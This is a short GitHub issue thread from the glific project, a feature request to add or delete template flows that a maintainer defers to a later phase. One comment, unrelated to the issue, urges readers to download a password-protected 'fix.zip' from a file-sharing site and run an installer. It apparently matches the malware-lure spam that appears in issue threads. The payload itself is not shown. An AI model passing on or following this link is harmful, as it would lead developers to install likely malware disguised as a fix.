### ISSUE TITLE
Template flows: Ability to delete or add a new template flow

### ISSUE THREAD

**Issue by madclaws** [glific/glific#3761]
**Is your feature request related to a problem? Please describe.**
Once the seeder for template flows are done, the next step is the system should have the ability to add/delete a template flow

**Describe the solution you'd like**
According to the [design doc](https://docs.google.com/document/d/1Ee025tJcOjxyAdNRF06e1OH7zu-_xvFIIeo4ZvGHFKk/edit#heading=h.9o17uokw0qou) we have to evaluate adding this functionality similar to `seed_migration.ex` would work or move to other options

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AkhileshNegi** [comment]
Will pick this up in next phase of template flows, maybe in next quarter
